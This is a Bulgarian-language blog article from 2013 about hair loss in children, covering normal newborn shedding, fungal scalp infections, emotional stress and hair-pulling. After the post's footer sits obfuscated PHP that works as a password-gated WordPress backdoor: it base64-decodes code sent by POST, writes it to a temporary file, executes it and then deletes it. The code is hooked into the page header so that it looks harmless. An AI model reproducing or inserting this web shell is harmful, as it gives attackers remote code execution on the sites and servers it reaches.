Косопад при децата | Косопад

Има ли косопад при децата?

косопад при децата

Косопадът при бебетата не е страшен

Косопад се среща сред представителите на всички възрасти, а децата също не правят изключение. Характерно при тях е, че в повечето от случаите той е предизвикан от болестно състояние и трябва да се вземат незабавни мерки.

Едно от малкото изключения е появата на косопад при новородените бебета. При тях по принцип това е нормално и няма никакви причини за притеснения. Вследствие на резките промени в хормоналните нива, сукалчетата често губят почти цялата си коса след раждането. Това е причината младите майки също да получат косопад след края на своята бременност.

Появата на косопад при децата и юношите обаче е сериозна индикация за тревога. Окапването на косата при подрастващите се дължи на различни причини, но те доста рядко са генетична предразположеност или недостиг на хранителни вещества, което е обичайно за зрелите индивиди. Често се предизвиква от инфекциозна болест, емоционално разстройство или силен стрес.

косопад при децата

Косопад при децата

Инфекциозните зарази най – често са гъбични инфекции. Предаването на бактериите става при характерната за най – малките свобода на поведението при игра с улични или домашни животни, на недотам чисти места и прочие. При косопад от гъбички характерните признаци са зачервяване на скалпа и олисяване на отделни зони, силен сърбеж, понякога общо неразположение. Подобно състояние се лекува с подходящи препарати и третиране.

Косопад при децата също така се получава и при емоционално разстройство. Не забравяйте, че вашите мъничета са силно чувствителни и лесно раними, а всяка тежка дума на изнервените родители се забива като стрела в тяхното съзнание. Ако забележите внезапна промяна в поведението им, незабавно потърсете квалифицирана помощ.

Накрая специалистите разкриват, че косопад при децата може да се появи дори и вследствие на лошия навик да дърпат силно косата си и по този начин да я увреждат по механичен път, предизвиквайки окапване.

02. април 2013 19:28:51 от Косопад
Категории: Косопад – Статии | Етикети: , , | 40 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}